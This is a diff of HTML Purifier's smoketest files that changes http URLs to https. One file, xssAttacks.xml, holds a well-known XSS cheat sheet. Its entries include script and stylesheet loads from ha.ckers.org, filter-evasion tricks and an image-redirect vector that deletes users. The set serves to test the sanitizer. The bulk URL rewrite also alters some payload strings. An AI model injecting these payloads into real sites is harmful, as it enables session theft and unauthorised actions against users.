<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier Legacy Smoketest Test Data</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

2
htmlpurifier-4.10.0/smoketests/cacheConfig.php
View File

@@ -11,4 +11,4 @@ $serial = $config->serialize();
$result = unserialize($serial);
$purifier = new HTMLPurifier($result);
echo htmlspecialchars($purifier->purify('<b>Bold</b><br><i><a href="http://google.com">no</a> formatting</i>'));
echo htmlspecialchars($purifier->purify('<b>Bold</b><br><i><a href="https://google.com">no</a> formatting</i>'));

2
htmlpurifier-4.10.0/smoketests/configForm.php
View File

@@ -40,7 +40,7 @@ if (isset($_GET['doc'])) {
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>HTML Purifier Config Form Smoketest</title>

4
htmlpurifier-4.10.0/smoketests/dataScheme.php
View File

@@ -5,8 +5,8 @@ require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml">
<head>
<title>HTML Purifier data Scheme Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

4
htmlpurifier-4.10.0/smoketests/extractStyleBlocks.php
View File

@@ -10,7 +10,7 @@ if (file_exists('../test-settings.php')) include '../test-settings.php';
if (!$csstidy_location) {
?>
Error: <a href="http://csstidy.sourceforge.net/">CSSTidy</a> library not
Error: <a href="https://csstidy.sourceforge.net/">CSSTidy</a> library not
found, please install and configure <code>test-settings.php</code>
accordingly.
<?php
@@ -29,7 +29,7 @@ $purified_html = $purifier->purify($html);
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Extract Style Blocks - HTML Purifier Smoketest</title>

20
htmlpurifier-4.10.0/smoketests/preserveYouTube.php
View File

@@ -5,8 +5,8 @@ require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml">
<head>
<title>HTML Purifier Preserve YouTube Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@@ -15,30 +15,30 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
<h1>HTML Purifier Preserve YouTube Smoketest</h1>
<?php
$string = '<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/BdU--T8rLns"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object>
$string = '<object width="425" height="350"><param name="movie" value="https://www.youtube.com/v/BdU--T8rLns"></param><param name="wmode" value="transparent"></param><embed src="https://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object>
<object width="416" height="337"><param name="movie" value="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc="></param><embed src="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc=" type="application/x-shockwave-flash" width="416" height="337"></embed></object>
<object width="416" height="337"><param name="movie" value="https://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc="></param><embed src="https://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc=" type="application/x-shockwave-flash" width="416" height="337"></embed></object>
<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object>
<object width="640" height="385"><param name="movie" value="https://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="https://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="385" width="480"><param name="width" value="480" /><param name="height" value="385" /><param name="src" value="http://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" /><embed height="385" src="http://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" type="application/x-shockwave-flash" width="480"></embed></object>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="385" width="480"><param name="width" value="480" /><param name="height" value="385" /><param name="src" value="https://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" /><embed height="385" src="https://www.youtube.com/p/E37ADDDFCA0FD050&amp;hl=en" type="application/x-shockwave-flash" width="480"></embed></object>
<object
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
id="ooyalaPlayer_229z0_gbps1mrs" width="630" height="354"
codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param
name="movie" value="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param
name="movie" value="https://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
/><param name="bgcolor" value="#000000" /><param
name="allowScriptAccess" value="always" /><param
name="allowFullScreen" value="true" /><param name="flashvars"
value="embedType=noscriptObjectTag&embedCode=pteGRrMTpcKMyQ052c8NwYZ5M5FdSV3j"
/><embed src="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
/><embed src="https://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2"
bgcolor="#000000" width="630" height="354"
name="ooyalaPlayer_229z0_gbps1mrs" align="middle" play="true"
loop="false" allowscriptaccess="always" allowfullscreen="true"
type="application/x-shockwave-flash"
flashvars="&embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za"
pluginspage="http://www.adobe.com/go/getflashplayer"></embed></object>
pluginspage="https://www.adobe.com/go/getflashplayer"></embed></object>
';
$regular_purifier = new HTMLPurifier();

6
htmlpurifier-4.10.0/smoketests/printDefinition.php
View File

@@ -21,15 +21,15 @@ $printer_css_definition->prepareGenerator($gen_config);
$printer_config_form = new HTMLPurifier_Printer_ConfigForm(
'config',
'http://htmlpurifier.org/live/configdoc/plain.html#%s'
'https://htmlpurifier.org/live/configdoc/plain.html#%s'
);
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>HTML Purifier Printer Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

4
htmlpurifier-4.10.0/smoketests/variableWidthAttack.php
View File

@@ -5,7 +5,7 @@ require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>HTML Purifier Variable Width Attack Smoketest</title>
@@ -14,7 +14,7 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
<body>
<h1>HTML Purifier Variable Width Attack Smoketest</h1>
<p>For more information, see
<a href="http://applesoup.googlepages.com/bypass_filter.txt">Cheng Peng Su's
<a href="https://applesoup.googlepages.com/bypass_filter.txt">Cheng Peng Su's
original advisory.</a> This particular exploit code appears only to work
in Internet Explorer, if it works at all.</p>
<h2>Test</h2>

4
htmlpurifier-4.10.0/smoketests/xssAttacks.php
View File

@@ -18,7 +18,7 @@ function formatCode($string)
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>HTML Purifier XSS Attacks Smoketest</title>
@@ -34,7 +34,7 @@ function formatCode($string)
<body>
<h1>HTML Purifier XSS Attacks Smoketest</h1>
<p>XSS attacks are from
<a href="http://ha.ckers.org/xss.html">http://ha.ckers.org/xss.html</a>.</p>
<a href="https://ha.ckers.org/xss.html">https://ha.ckers.org/xss.html</a>.</p>
<p><strong>Caveats:</strong>
<tt>Google.com</tt> has been programatically disallowed, but as you can
see, there are ways of getting around that, so coverage in this area

132
htmlpurifier-4.10.0/smoketests/xssAttacks.xml
View File

@@ -30,7 +30,7 @@
</attack>
<attack>
<name>SCRIPT w/Source File</name>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT SRC=https://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;</code>
<desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
<label>Basic XSS Attacks</label>
@@ -174,7 +174,7 @@
</attack>
<attack>
<name>IMG Embedded commands 1</name>
<code>&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
<code>&lt;IMG SRC=&quot;https://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</code>
<desc>This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.</desc>
<label>HTML Element Attacks</label>
@@ -183,8 +183,8 @@
</attack>
<attack>
<name>IMG Embedded commands 2</name>
<code>Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser</code>
<desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC=&quot;http://badguy.com/a.jpg&quot;&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
<code>Redirect 302 /a.jpg https://victimsite.com/admin.asp&amp;deleteuser</code>
<desc>IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal &lt;IMG SRC=&quot;https://badguy.com/a.jpg&quot;&gt; could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -220,7 +220,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>LAYER</name>
<code>&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
<code>&lt;LAYER SRC=&quot;https://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;</code>
<desc>Layer (Older Netscape only)</desc>
<label>HTML Element Attacks</label>
@@ -239,7 +239,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>US-ASCII encoding</name>
<code>%BCscript%BEalert(%A2XSS%A2)%BC/script%BE</code>
<desc>Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
<desc>Found by Kurt Huwig https://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS4&lt;/span&gt;]</browser>
@@ -256,7 +256,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>META w/data:URL</name>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;</code>
<desc>This is nice because it also doesn&apos;t have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details</desc>
<desc>This is nice because it also doesn&apos;t have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see https://www.ietf.org/rfc/rfc2397.txt for more details</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -264,8 +264,8 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>META w/additional URL parameter</name>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an &quot;http://&quot; you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com)</desc>
<code>&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=https://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Meta with additional URL parameter. If the target website attempts to see if the URL contains an &quot;https://&quot; you can evade it with the following technique (Submitted by Moritz Naumann https://www.moritz-naumann.com)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -282,7 +282,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>OBJECT</name>
<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
<code>&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;https://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;</code>
<desc>If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS</desc>
<label>HTML Element Attacks</label>
@@ -299,9 +299,9 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Embed Flash</name>
<code>&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
<code>&lt;EMBED SRC=&quot;https://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;</code>
<desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=&quot;never&quot; and allownetworking=&quot;internal&quot; it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :</desc>
<desc>Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=&quot;never&quot; and allownetworking=&quot;internal&quot; it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: https://ha.ckers.org/weird/xssflash.html :</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -327,7 +327,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>STYLE w/Comment</name>
<code>&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;</code>
<desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one)</desc>
<desc>STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov https://www.pixel-apes.com/ for this one)</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -371,7 +371,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 1</name>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;</code>
<code>&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;https://ha.ckers.org/xss.css&quot;&gt;</code>
<desc>Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won&apos;t work unless there is some content on the page other than the vector itself, so you&apos;ll need to add a single letter to the page to make it work if it&apos;s an otherwise blank page.</desc>
<label>HTML Element Attacks</label>
@@ -380,8 +380,8 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 2</name>
<code>&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 2 (this works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
<code>&lt;STYLE&gt;@import&apos;https://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 2 (this works the same as above, but uses a &lt;STYLE&gt; tag instead of a &lt;LINK&gt; tag). A slight variation on this vector was used to hack Google Desktop https://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -389,8 +389,8 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 3</name>
<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
<desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
<code>&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;https://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;</code>
<desc>Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: &lt;https://ha.ckers.org/xss.css&gt;; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -398,7 +398,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Remote Stylesheet 4</name>
<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
<code>&lt;STYLE&gt;BODY{-moz-binding:url(&quot;https://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;</code>
<desc>Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites.</desc>
<label>HTML Element Attacks</label>
@@ -426,7 +426,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<attack>
<name>XML namespace</name>
<code>&lt;HTML xmlns:xss&gt;
&lt;?import namespace=&quot;xss&quot; implementation=&quot;http://ha.ckers.org/xss.htc&quot;&gt;
&lt;?import namespace=&quot;xss&quot; implementation=&quot;https://ha.ckers.org/xss.htc&quot;&gt;
&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;
&lt;/HTML&gt;</code>
@@ -440,7 +440,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
<code>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;</code>
<desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc>
<desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult https://www.sec-consult.html while auditing Yahoo.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -458,7 +458,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>XML (locally hosted)</name>
<code>&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
<code>&lt;XML SRC=&quot;https://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;</code>
<desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc>
@@ -474,7 +474,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;
&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; &lt;/BODY&gt;&lt;/HTML&gt;</code>
<desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
<desc>HTML+TIME in XML. This is how Grey Magic https://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -501,7 +501,7 @@ xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(&quot;XSS&quot;))&apos;&gt;</
</attack>
<attack>
<name>Local .htc file</name>
<code>&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;</code>
<code>&lt;XSS STYLE=&quot;behavior: url(https://ha.ckers.org/xss.htc);&quot;&gt;</code>
<desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc>
<label>Other Attacks</label>
